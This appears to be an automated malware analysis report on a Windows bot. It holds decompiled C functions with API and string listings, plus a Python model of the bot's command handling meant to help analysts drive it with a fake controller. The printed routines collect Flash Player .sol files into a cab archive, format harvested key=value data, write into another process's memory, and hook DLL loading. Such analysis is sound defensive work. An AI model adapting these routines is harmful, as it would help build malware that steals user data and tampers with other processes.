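    return tag + struct.pack("<I", CHUNK_SIZE)


def stream_chunks(payload: bytes, acks: Iterator[bytes]) -> List[bytes]:
    """Send chunks until an ack is missing or disagrees with the chunk length just sent.

    Assumption (this example's): the 4-byte ack is compared with the number of bytes
    the object's read method returned for the chunk, i.e. len(chunk).
    """
    sent: List[bytes] = []
    for i in range(0, len(payload), CHUNK_SIZE):
        chunk = payload[i:i + CHUNK_SIZE]
        sent.append(chunk)
        ack = next(acks, None)
        if ack is None or len(ack) != 4 or struct.unpack("<I", ack)[0] != len(chunk):
            break
    return sent


def dispatch(frame: bytes, payload: bytes = b"",
             acks: Optional[Iterator[bytes]] = None) -> Tuple[str, List[bytes]]:
    """Return (action, messages the bot would send) for one received frame."""
    cmd, body = parse_frame(frame)
    if cmd == CMD_ECHO_CLEANUP and len(body) >= 4:
        return "echo-then-cleanup", [body]          # send(body); if fully sent, E00409F45 runs
    if cmd == CMD_STREAM:
        acks = acks if acks is not None else iter(())
        return "stream", [stream_header(body)] + stream_chunks(payload, acks)
    return "close", []                               # L30/L31: free the body, shut the socket


if __name__ == "__main__":
    # Constructed frames: a cleanup command and a stream command over a 0x2800-byte payload.
    print(dispatch(struct.pack("<II", CMD_ECHO_CLEANUP, 6) + b"ABCDEF"))
    good_acks = iter(struct.pack("<I", n) for n in (0x1000, 0x1000, 0x800))
    action, msgs = dispatch(struct.pack("<II", CMD_STREAM, 4) + b"tag!", bytes(0x2800), good_acks)
    print(action, len(msgs), [len(m) for m in msgs])
```

The 1..0xffff length check is the only input validation on this path; a body shorter than 4 bytes for command 0x14 is silently dropped, and a wrong or absent acknowledgement during a 0x0a transfer ends the loop without any error message to the peer, which is what an analyst writing a fake controller to trigger this handler needs to reproduce.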

    C-Code - Quality: 97%
    			E00404550(void* __ecx, void* __eflags, intOrPtr _a4) {
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				void* _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v48;
    				char _v52;
    				char _v2104;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t47;
    				intOrPtr _t53;
    				intOrPtr _t54;
    				intOrPtr* _t69;
    				signed int _t74;
    				intOrPtr _t77;
    				signed int _t83;
    				signed int _t85;
    				void* _t86;
    
    				_v12 = 0;
    				if(E0040DC05(0, __ecx,  &_v52, _a4) != 0) {
    					_t83 =  &_v24;
    					_v24 = 0;
    					_t47 = E00408F05(_v48, _v52, _t83);
    					_v32 = _t47;
    					if(_t47 != 0) {
    						asm("sbb esi, esi");
    						_t74 = _v24 - 9;
    						_t85 =  !_t83 & _t74;
    						_v16 = 0;
    						_v20 = 0;
    						if(_t85 > 0) {
    							_t13 = _t47 + 4; // 0x4
    							_t69 = _t13;
    							while(1) {
    								_t77 =  *((intOrPtr*)(_t69 - 4));
    								_v36 = _t77;
    								if(_t77 == 0) {
    									break;
    								}
    								_t53 =  *_t69;
    								_v28 = _t53;
    								if(_t53 == 0) {
    									break;
    								} else {
    									_t54 =  *((intOrPtr*)(_t69 + 4));
    									_a4 = _t54;
    									if(_t54 == 0) {
    										break;
    									} else {
    										E0040D112(_t77);
    										E0040D112(_v28);
    										_t79 = _a4;
    										E0040D112(_a4);
    										if(_v16 == 0) {
    											L9:
    											wnsprintfA( &_v2104, 0x7ff, "\nPath: %s\n", _a4);
    											_t86 = _t86 + 0x10;
    											if(E00408EAC( &_v12,  &_v2104) == 0) {
    												goto L14;
    											} else {
    												goto L10;
    											}
    										} else {
    											_t74 = _t74 | 0xffffffff;
    											if(E0040D3EC(_t74, _t79, _t74, _v16) == 0) {
    												L10:
    												wnsprintfA( &_v2104, 0x7ff, "%s=%s\n", _v36,  *_t69);
    												_t86 = _t86 + 0x14;
    												if(E00408EAC( &_v12,  &_v2104) == 0) {
    													L14:
    													_v12 = _v12 & 0x00000000;
    												} else {
    													_v20 = _v20 + 9;
    													_t69 = _t69 + 0x24;
    													_v16 = _a4;
    													if(_v20 < _t85) {
    														continue;
    													} else {
    													}
    												}
    											} else {
    												goto L9;
    											}
    										}
    									}
    								}
    								goto L15;
    							}
    							E0040CF40(_v12);
    							goto L14;
    						}
    						L15:
    						E0040CF5C(_v24, _v32);
    					}
    					E0040DCBE( &_v52);
    				}
    				return _v12;
    			}
    Instruction addresses of the listing above span 0x00404566 to 0x004046a7 (per-line address column not reproduced).

    APIs
      • Part of subcall function 0040DC05: CreateFileW.KERNEL32(?,00000000,?,00000000,00000003,00000000,00000000,00000000,00415FD6,?,?,?,00403A07,004124A8,?,00000006), ref: 0040DC31
      • Part of subcall function 0040DC05: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00403A07,004124A8,?,00000006,00000000,00000000,00000000,00000000), ref: 0040DC44
    • wnsprintfA.SHLWAPI ref: 0040461B
    • wnsprintfA.SHLWAPI ref: 0040464D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Filewnsprintf$CreateSize
    • String ID: Path: %s$%s=%s
    • API String ID: 2143265763-3969205073
    • Opcode ID: 8dd4956661a0e19bd514905204aa163be3177d280e5a379a68073fcbd262b9cc
    • Instruction ID: 5284e0f240df07e0d7c49856f8ac56b9ea4e37b3a254fcb1138128b2bcd1faf8
    • Opcode Fuzzy Hash: 8dd4956661a0e19bd514905204aa163be3177d280e5a379a68073fcbd262b9cc
    • Instruction Fuzzy Hash: 46418FB1D002099BCF00EF95C8419EEB7B5BF85314F15457AE900B72D1EB39AA45CF98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00408723(char _a4) {
    				char _v9;
    				char _v16;
    				char _v416;
    				intOrPtr _t19;
    				intOrPtr _t20;
    				void* _t23;
    				char _t28;
    				void* _t33;
    				void* _t39;
    				signed char _t42;
    				void* _t46;
    
    				_t19 =  *0x412a8c; // 0x416000
    				_t1 = _t19 + 0x26; // 0x400000e
    				_t2 = _t19 + 0x24; // 0xe001b
    				_t39 = ( *_t1 & 0x000000ff) + _t19;
    				_t3 = _t19 + 0x25; // 0xe00
    				_t20 =  *_t3;
    				_t5 = _t39 + 0x12c; // 0xe0147
    				_t40 = ( *_t2 & 0x000000ff) + _t5;
    				_t42 = 0;
    				_v9 = 0;
    				if(_t20 > 0) {
    					while(1) {
    						_t46 =  *((intOrPtr*)(_t40 + (_t42 & 0x000000ff) * 2)) -  *0x412a78; // 0x409
    						if(_t46 == 0) {
    							break;
    						}
    						_t42 = _t42 + 1;
    						if(_t42 < _t20) {
    							continue;
    						} else {
    						}
    						goto L5;
    					}
    					_v9 = 1;
    				}
    				L5:
    				L00403961();
    				 *0x412dd0(0x4126b0);
    				 *0x412970 =  *0x412970 + 1;
    				_t23 = E0040A04D(_t40, E00403D72, 0x412706);
    				if(_v9 == 0) {
    					E004085E6();
    					 *0x412bdc(0x202,  &_v416);
    					 *0x412970 =  *0x412970 + 1;
    					E0040A04D(_t40, E00408464, 0);
    					_t28 =  *0x412974; // 0x0
    					_v16 = _t28;
    					E00410B83();
    					 *0x412970 =  *0x412970 + 1;
    					 *0x412dd0(0x4126c8, _a4,  &_v16);
    					 *0x412970 =  *0x412970 + 1;
    					 *0x4126e4 = 0;
    					 *0x4126e0 = 0;
    					_a4 = 0;
    					_t33 = E00407945( &_a4, _t40, 0, "PopOpO03-3331111");
    					_t49 = _t33;
    					if(_t33 != 0) {
    						_t40 = _t33;
    						E004043BC(_a4, _t33, _t49);
    						E0040CF40(_a4);
    					}
    					_t23 = E0040A04D(_t40, E004042F5, 0x412970);
    					if(_t23 != 0) {
    						 *0x412970 =  *0x412970 - 1;
    						return _t23;
    					}
    				}
    				return _t23;
    			}
    Instruction addresses of the listing above span 0x0040872c to 0x0040883e (per-line address column not reproduced).

    APIs
    • RtlInitializeCriticalSection.NTDLL(004126B0), ref: 00408778
    • WSAStartup.WS2_32(00000202,?), ref: 004087AD
    • RtlInitializeCriticalSection.NTDLL(004126C8), ref: 004087E3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalInitializeSection$Startup
    • String ID: PopOpO03-3331111
    • API String ID: 100036477-962168976
    • Opcode ID: 0901eebd5d8b5c639a9aa01764fffd2912665666cc28b7abaa37baa4a33bf8b9
    • Instruction ID: 68e7f338d6abc91738887d919ae094527a9c08cbd5483efdfb38f39f2fc3d448
    • Opcode Fuzzy Hash: 0901eebd5d8b5c639a9aa01764fffd2912665666cc28b7abaa37baa4a33bf8b9
    • Instruction Fuzzy Hash: 562126B5200204AEC710AFB8DE819ED3BB5BB05344F10807FB481F31E3DAB944658B6E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E0040F6C1() {
    				WCHAR* _v4;
    				void* _t25;
    				intOrPtr _t27;
    				WCHAR* _t33;
    				intOrPtr* _t35;
    
    				_t33 = 0;
    				if(E0040F5DA() != 0) {
    					_t35 = RtlAllocateHeap( *0x413e5c, 8, 0x954);
    					if(_t35 == 0) {
    						L7:
    						E0040F6A0();
    					} else {
    						_t2 = _t35 + 0x53e; // 0x53e
    						if(PathCombineW(_t2, _v4, 0) == 0) {
    							L6:
    							E0040CF40(_t35);
    							goto L7;
    						} else {
    							_t3 = _t35 + 0x746; // 0x746
    							if((GetTempPathW(0x103, _t3) & 0xffffff00 | _t21 > 0x00000000) == 0) {
    								goto L6;
    							} else {
    								 *((intOrPtr*)(_t35 + 0x14)) = 0x7fffffff;
    								_t7 = _t35 + 0x10; // 0x10
    								 *_t7 = 0x7fffffff;
    								 *((intOrPtr*)(_t35 + 0x24)) = 1;
    								 *((intOrPtr*)(_t35 + 0x28)) = 1;
    								_t10 = _t35 + 0x132; // 0x132
    								E0040CF7C(_t10, "cabinet.dll", 0xc);
    								_t11 = _t35 + 0x232; // 0x232
    								_t25 = E0040CF7C(_t11, "?O", 2);
    								_t12 = _t35 + 4; // 0x4
    								_t27 =  *0x41348c(_t12, E0040F546, E0040F29A, E0040F2AD, E0040F2C0, E0040F3AC, E0040F3E3, E0040F429, E0040F44A, E0040F494, E0040F4CE, _t25, _t35);
    								 *_t35 = _t27;
    								if(_t27 == 0) {
    									goto L6;
    								} else {
    									_t33 = _t35;
    								}
    							}
    						}
    					}
    				}
    				return _t33;
    			}
    Instruction addresses of the listing above span 0x0040f6c2 to 0x0040f7be (per-line address column not reproduced).

    APIs
      • Part of subcall function 0040F5DA: LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040F6C9,00000000,0040F9A3,?,00000000,00000000, L@,00410FEB,?, L@,?), ref: 0040F5EE
      • Part of subcall function 0040F5DA: GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040F607
      • Part of subcall function 0040F5DA: GetProcAddress.KERNEL32(FCIAddFile), ref: 0040F61D
      • Part of subcall function 0040F5DA: GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040F633
      • Part of subcall function 0040F5DA: GetProcAddress.KERNEL32(FCIDestroy), ref: 0040F649
      • Part of subcall function 0040F5DA: HeapCreate.KERNEL32(00000000,00080000,00000000), ref: 0040F677
      • Part of subcall function 0040F5DA: FreeLibrary.KERNEL32 ref: 0040F68C
    • RtlAllocateHeap.NTDLL(00000008,00000954,00000000), ref: 0040F6DF
    • PathCombineW.SHLWAPI(0000053E,?,00000000), ref: 0040F6FB
    • GetTempPathW.KERNEL32(00000103,00000746), ref: 0040F715
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$HeapLibraryPath$AllocateCombineCreateFreeLoadTemp
    • String ID: cabinet.dll
    • API String ID: 3318130981-741892446
    • Opcode ID: 836055a5f4ea86037d5b926fb0e0e232a533c344921eb610ed3dc3d28b078de8
    • Instruction ID: a6f59f06e4f78d13bfff6456a59f94fa6463616f34fb44b764fa5119b8882f09
    • Opcode Fuzzy Hash: 836055a5f4ea86037d5b926fb0e0e232a533c344921eb610ed3dc3d28b078de8
    • Instruction Fuzzy Hash: 35210E31280701BBD230AF219C06F9777A9AB45B01B10853FB942B3AC1DBBCE50C8B1D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00410F88(void* __ecx, void* __edx, char _a4) {
    				short _v528;
    				short _v1048;
    				void* _t20;
    				int _t25;
    				void* _t26;
    				void* _t27;
    
    				_t27 = __edx;
    				_t26 = __ecx;
    				_t25 = 0;
    				if(GetTempPathW(0xf6,  &_v1048) - 1 <= 0xf5 && GetTempFileNameW( &_v1048, 0x40391c, 0,  &_v528) > 0 && E0040DD3C( &_v528) != 0) {
    					_t5 =  &_a4; // 0x404c20
    					_t20 = E0040F994( &_v528,  *_t5);
    					_t31 = _t20;
    					if(_t20 != 0) {
    						_t25 = E00410F35(_t26, _t27, _t31,  &_v528, _a4, L"mfplayer_cfg.cab");
    						E0040DD3C( &_v528);
    					}
    				}
    				return _t25;
    			}
    Instruction addresses of the listing above span 0x00410f88 to 0x00411015 (per-line address column not reproduced).

    APIs
    • GetTempPathW.KERNEL32(000000F6,?,00000000), ref: 00410FA0
    • GetTempFileNameW.KERNEL32(?,0040391C,00000000,?), ref: 00410FC2
      • Part of subcall function 0040DD3C: SetFileAttributesW.KERNELBASE(?,00000020,0040FBDD,?,?,?,00000000), ref: 0040DD42
      • Part of subcall function 0040DD3C: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040DD4C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Temp$AttributesDeleteNamePath
    • String ID: L@$mfplayer_cfg.cab
    • API String ID: 838033943-3102061355
    • Opcode ID: 99eda8daf4d12136975021dbd60b525d7649a2c91204e152e61939720c1b4439
    • Instruction ID: 7937309a437ccfda3a51056a1d76e2cf1b653a5aa8002bdd0aa36495cddce824
    • Opcode Fuzzy Hash: 99eda8daf4d12136975021dbd60b525d7649a2c91204e152e61939720c1b4439
    • Instruction Fuzzy Hash: 3F014FB194021C6ACF20AFA4DD89FDA777C9B08744F1084B7B604E7192D67CDAC99B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00404BC8(intOrPtr _a4) {
    				short _v528;
    				void* __edi;
    				void* _t8;
    				void* _t15;
    
    				_t8 =  *0x412a6c(0,  &_v528, 0x1a, 0);
    				if(_t8 != 0) {
    					PathCombineW( &_v528,  &_v528, L"Macromedia\\Flash Player");
    					if(_a4 == 0) {
    						_t8 = E00410F88(_t14, _t15,  &_v528);
    					} else {
    						_t14 =  &_v528;
    						_t8 = E0040A077( &_v528, L"*.sol");
    					}
    				}
    				if(_a4 != 0) {
    					return _t8;
    				} else {
    					return E004046AA(_t14, 0, 2, 0);
    				}
    			}

    APIs
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,00000000,00000000), ref: 00404BE0
    • PathCombineW.SHLWAPI(?,?,Macromedia\Flash Player), ref: 00404BF7
      • Part of subcall function 0040A077: PathCombineW.SHLWAPI(?,?,00401040,00000000,00000000,00000000), ref: 0040A09A
      • Part of subcall function 0040A077: FindFirstFileW.KERNEL32(?,?), ref: 0040A0AD
      • Part of subcall function 0040A077: PathMatchSpecW.SHLWAPI(?,?), ref: 0040A0F8
      • Part of subcall function 0040A077: PathCombineW.SHLWAPI(?,?,0000002E), ref: 0040A110
      • Part of subcall function 0040A077: FindNextFileW.KERNEL32(00000000,?,?), ref: 0040A14B
      • Part of subcall function 0040A077: FindClose.KERNEL32(00000000), ref: 0040A15A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Path$CombineFind$File$CloseFirstFolderMatchNextSpecSpecial
    • String ID: *.sol$Macromedia\Flash Player
    • API String ID: 304139136-1405511494
    • Opcode ID: 5caf7eba2ccd23bd81a2b18dd006a194f7d719e39bc1712a84a89ab17f9ecbb6
    • Instruction ID: dfdd04799b28c069b5ae4ba10155d839c5e1a14ad28c391e939348e5b89c198f
    • Opcode Fuzzy Hash: 5caf7eba2ccd23bd81a2b18dd006a194f7d719e39bc1712a84a89ab17f9ecbb6
    • Instruction Fuzzy Hash: 5BF096F150530C69F710EB619D89EAF772C9B84344F208577B714A64C2D6B89D458629
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00410341(signed int __edx, long __edi, void** __esi, void* _a4) {
    				char _v5;
    				long _v12;
    				void _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _t22;
    				signed int _t25;
    				signed int _t41;
    				void** _t43;
    
    				_t43 = __esi;
    				_t41 = __edx;
    				_v5 = 0;
    				if(__edi <= 0xa00000) {
    					_t22 = E0040DD0C( *__esi);
    					_v36 = _t22;
    					_v32 = _t41;
    					if((_t22 & _t41) != 0xffffffff && E0040DCEC( *__esi, 0, 0, 2) != 0) {
    						_t25 = E0040DD0C( *__esi);
    						_v28 = _t25;
    						_v24 = _t41;
    						if((_t25 & _t41) != 0xffffffff) {
    							E0040CFFE( &_v20,  &_v20, 0, 5);
    							_v20 = __esi[4] ^ __edi;
    							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, __edi,  &_v12, 0) == 0 || _v12 != __edi) {
    								E0040DCEC( *_t43, _v28, _v24, 0);
    								SetEndOfFile( *_t43);
    							} else {
    								_v5 = 1;
    							}
    						}
    						FlushFileBuffers( *_t43);
    						E0040DCEC( *_t43, _v36, _v32, 0);
    					}
    				}
    				return _v5;
    			}

    APIs
      • Part of subcall function 0040DD0C: SetFilePointerEx.KERNEL32(?,00000000,00000000,00410360,00000001,00410360,?,00000000,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 0040DD21
      • Part of subcall function 0040DCEC: SetFilePointerEx.KERNEL32(00000004,00000004,00000004,00000000,00000002,00410317,?,00000000,00000000,00000000), ref: 0040DCFE
    • WriteFile.KERNEL32(?,00000000,00000005,00000000,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000), ref: 004103B9
    • WriteFile.KERNEL32(?,00000005,00000000,00000005,00000000,?,?,?,00000008,00000000,00000000), ref: 004103D4
    • SetEndOfFile.KERNEL32(?,?,?,00000008,00000000,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 004103F9
    • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 00410401
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$PointerWrite$BuffersFlush
    • String ID:
    • API String ID: 1289656144-0
    • Opcode ID: 4ab6209e606ad639b4d0aa36ea1eaa4da40e2909b8b734c14b4dd06c8b967e33
    • Instruction ID: 465fb72d9efd9005c1f753ecd4312ceac0d4ed359152173c6b9a5d926640979f
    • Opcode Fuzzy Hash: 4ab6209e606ad639b4d0aa36ea1eaa4da40e2909b8b734c14b4dd06c8b967e33
    • Instruction Fuzzy Hash: 16214875900108EFEB219FE5CC85AEEBBB9FF08344F14852AF590A11A1D37A4994DB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00405452(void* __ecx, void* __edi, intOrPtr _a4) {
    				long _v8;
    				intOrPtr _t10;
    				intOrPtr _t13;
    				void* _t15;
    				void* _t31;
    				void* _t37;
    
    				_t37 = __edi;
    				if(__edi <= 0x3e8) {
    					 *0x412dd4(0x412708);
    					_v8 = GetTickCount();
    					_t10 =  *0x412720; // 0x0
    					if(_t10 != 0 && _v8 - _t10 > 0xea60) {
    						E0040541D();
    					}
    					_t12 = ( *0x412704 & 0x0000ffff) + _t37;
    					if(( *0x412704 & 0x0000ffff) + _t37 <= 0x3e8) {
    						_t13 = E0040CEF9(_t12,  *0x412728);
    						if(_t13 != 0) {
    							 *0x412728 = _t13;
    							E0040CF7C(( *0x412704 & 0x0000ffff) + _t13, _a4, _t37);
    							 *0x412704 =  *0x412704 + _t37;
    						}
    					} else {
    						_t31 = RtlAllocateHeap( *0x413e5c, 8, 0x3ec);
    						if(_t31 != 0) {
    							E0040CF7C(_t17 - _t37 + 0x3e8, _a4, _t37);
    							E0040CF7C(_t31, ( *0x412704 & 0x0000ffff) +  *0x412728 + _t37 - 0x3e8, 0x3e8 - _t37);
    							E0040CF40( *0x412728);
    							 *0x412728 = _t31;
    							 *0x412704 = 0x3e8;
    						}
    					}
    					 *0x412720 = _v8;
    					_t15 =  *0x412dd8(0x412708);
    				} else {
    					_t15 = E0040541D();
    				}
    				return _t15;
    			}

    APIs
    • RtlEnterCriticalSection.NTDLL(00412708), ref: 0040546F
    • GetTickCount.KERNEL32 ref: 00405475
    • RtlAllocateHeap.NTDLL(00000008,000003EC), ref: 004054B4
    • RtlLeaveCriticalSection.NTDLL(00412708), ref: 00405543
      • Part of subcall function 0040541D: RtlEnterCriticalSection.NTDLL(00412708), ref: 00405424
      • Part of subcall function 0040541D: RtlLeaveCriticalSection.NTDLL(00412708), ref: 0040544A
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$EnterLeave$AllocateCountHeapTick
    • String ID:
    • API String ID: 2032597661-0
    • Opcode ID: a171f2932746065c09769cb19ee86ceb18ecc2350e6a474824cb23a10c3258f5
    • Instruction ID: 1ffb31d34ea1d2de778b0a17c99054d7cff915f2aca7fe009a68b0076a66bccb
    • Opcode Fuzzy Hash: a171f2932746065c09769cb19ee86ceb18ecc2350e6a474824cb23a10c3258f5
    • Instruction Fuzzy Hash: 8521FF71500210EBCB116F65EE95EEF3BA9EB49745700813BF515E22E1D6B889A0CF2C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406835(void* __edi, void* _a4) {
    				long _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				int _t22;
    				void* _t24;
    
    				_t24 =  *0x4129ec; // 0xffffffff
    				_t22 = 0;
    				if(VirtualQueryEx(_t24, __edi,  &_v36, 0x1c) != 0 && _v36.Protect != 1 && (_v36.Protect & 0x00000100) == 0 && _v36.RegionSize != 0 && VirtualProtectEx(_t24, __edi, 4, 0x40,  &_v8) != 0) {
    					_t22 = WriteProcessMemory(_t24, __edi, _a4, 4, 0);
    					VirtualProtectEx(_t24, __edi, 4, _v8,  &_v8);
    				}
    				return 0 | _t22 != 0x00000000;
    			}

    APIs
    • VirtualQueryEx.KERNEL32(FFFFFFFF,?,?,0000001C,00412448,00000000), ref: 0040684D
    • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000040,00000000), ref: 00406875
    • WriteProcessMemory.KERNEL32(FFFFFFFF,?,?,00000004,00000000), ref: 00406887
    • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000000,00000000), ref: 0040689A
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Virtual$Protect$MemoryProcessQueryWrite
    • String ID:
    • API String ID: 2789181485-0
    • Opcode ID: 4a1414de8f6fcd9fb900060e48988d82c2d0ef1868d4af8f223f611dafdccb13
    • Instruction ID: a55d5a2fbb3f21b82de9c2d0d020b877abb4158410f206941a8c2ef6ae20ab45
    • Opcode Fuzzy Hash: 4a1414de8f6fcd9fb900060e48988d82c2d0ef1868d4af8f223f611dafdccb13
    • Instruction Fuzzy Hash: AD015E72641209BBEB219A919D89FEF767CAF45714F008036FB01E5180D6B89A608B69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			E004051D6(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
    				long _t16;
    				void* _t18;
    				void* _t19;
    				HMODULE* _t21;
    
    				_t21 = _a16;
    				_t19 =  *0x412b18(_a4, _a8, _a12, _t21);
    				_t16 = LdrLoadDll(_a4, _a8, _a12, _t21);
    				if(_t16 == 0 && _t19 != 0 &&  *( *_t21) == 0x5a4d) {
    					 *0x412dd4(0x4126ec);
    					E00406A74(0x412448, 0x5a4d, _t18,  *_t21);
    					 *0x412dd8(0x4126ec);
    				}
    				return _t16;
    			}

    APIs
    • LdrGetDllHandle.NTDLL(?,?,?,?), ref: 004051E9
    • LdrLoadDll.NTDLL(?,?,?,?), ref: 004051FB
    • RtlEnterCriticalSection.NTDLL(004126EC), ref: 0040521D
    • RtlLeaveCriticalSection.NTDLL(004126EC), ref: 00405230
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$EnterHandleLeaveLoad
    • String ID:
    • API String ID: 1466281904-0
    • Opcode ID: c6a79b7b14800902cadf42bc909900be28cfe1bbff20eb4c58b936233f281649
    • Instruction ID: eedc1082a0b2c18afda14114fb43136e1a95e30f82504f764a0424dde226b1ef
    • Opcode Fuzzy Hash: c6a79b7b14800902cadf42bc909900be28cfe1bbff20eb4c58b936233f281649
    • Instruction Fuzzy Hash: CEF03136200508BBDB115F95ED44CEB3B79EF89324700803AF90493260D7B598619F65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0040A9FB(void* __edx, intOrPtr _a4, char _a7, intOrPtr _a8, intOrPtr* _a12, signed int* _a16) {
    				signed int _v5;
    				char _v6;
    				unsigned int _v12;
    				signed int _v16;
    				unsigned int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				char _v52;
    				char _v68;
    				char _v84;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed short _t140;
    				signed int _t146;
    				signed short _t147;
    				signed short _t148;
    				signed int _t149;
    				signed short _t151;
    				signed char _t152;
    				signed int _t153;
    				signed int _t157;
    				void* _t159;
    				signed char _t163;
    				unsigned int _t164;
    				intOrPtr _t167;
    				intOrPtr _t168;
    				signed int _t169;
    				signed int _t171;
    				signed int _t173;
    				signed int _t176;
    				signed int _t180;
    				void* _t191;
    				signed int _t192;
    				signed int _t196;
    				void* _t198;
    				intOrPtr _t202;
    				signed int _t208;
    				signed int _t210;
    				signed int _t212;
    				void* _t219;
    				signed int _t220;
    				void* _t223;
    				intOrPtr* _t224;
    				char* _t239;
    				signed int _t246;
    				void* _t250;
    				intOrPtr _t255;
    				signed int _t256;
    				signed int _t261;
    				signed int* _t262;
    				signed int _t263;
    				signed int _t264;
    				char* _t266;
    				signed int _t269;
    				intOrPtr* _t271;
    				signed int _t273;
    				void* _t274;
    				void* _t275;
    
    				_t255 = _a8;
    				if( *((intOrPtr*)(_t255 + 0x41c)) < 8) {
    					return 0;
    				}
    				_v16 = _v16 & 0x00000000;
    				_t269 = E0040FE8D( &_v16, __edx, __eflags, _a4, 0x4e2a, 0x20000000);
    				_v32 = _t269;
    				_v6 = 0;
    				__eflags = _t269;
    				if(_t269 == 0) {
    					L73:
    					E0040CF40(_v32);
    					return _v6;
    				} else {
    					__eflags = _v16 - 0x10;
    					if(_v16 <= 0x10) {
    						goto L73;
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						__eflags = ( *_t269 & 0x0000ffff) - _v32 + _t269 - _v16;
    						if(( *_t269 & 0x0000ffff) - _v32 + _t269 > _v16) {
    							goto L73;
    						}
    						_t140 =  *(_t269 + 8) & 0x0000ffff;
    						__eflags = _t140;
    						if(_t140 == 0) {
    							L13:
    							_t269 = _t269 + ( *_t269 & 0x0000ffff);
    							__eflags = _t269 - _v32 + 0x10 - _v16;
    							if(_t269 - _v32 + 0x10 < _v16) {
    								continue;
    							}
    							goto L73;
    						}
    						_v12 = (_t140 & 0x0000ffff) + _t269;
    						_v24 = E0040D3C6((_t140 & 0x0000ffff) + _t269);
    						_t146 = E00408C0D((_t140 & 0x0000ffff) + _t269, _t145, _t255,  *((intOrPtr*)(_t255 + 0x400)), 0, 0, 0);
    						__eflags = _t146;
    						if(_t146 == 0) {
    							goto L13;
    						}
    						_t147 =  *(_t269 + 0xa) & 0x0000ffff;
    						__eflags = _t147;
    						if(_t147 == 0) {
    							L9:
    							_t148 =  *(_t269 + 0xc) & 0x0000ffff;
    							__eflags = _t148;
    							if(_t148 == 0) {
    								L15:
    								__eflags =  *((char*)(_t269 + 6)) - 9;
    								if( *((char*)(_t269 + 6)) > 9) {
    									 *((char*)(_t269 + 6)) = 0;
    								}
    								__eflags =  *(_t269 + 4);
    								if( *(_t269 + 4) == 0) {
    									 *(_t269 + 4) = 1;
    								}
    								_t149 =  *((intOrPtr*)(_t269 + 6));
    								_v5 = _t149;
    								__eflags = _t149;
    								if(_t149 == 0) {
    									_v5 = 6;
    								}
    								_t256 =  *(_t255 + 0x418);
    								_t219 =  *((intOrPtr*)(_a8 + 0x41c)) + _t256;
    								_v20 = _v20 & 0x00000000;
    								_t244 = _t256;
    								while(1) {
    									__eflags = _t256 - _t219;
    									if(_t256 >= _t219) {
    										break;
    									}
    									__eflags =  *_t256 - 0x3d;
    									if( *_t256 != 0x3d) {
    										L40:
    										_t256 = _t256 + 1;
    										__eflags = _t256;
    										continue;
    									}
    									_t151 =  *(_t269 + 0xe) & 0x0000ffff;
    									_a7 = 0;
    									__eflags = _t151;
    									if(_t151 != 0) {
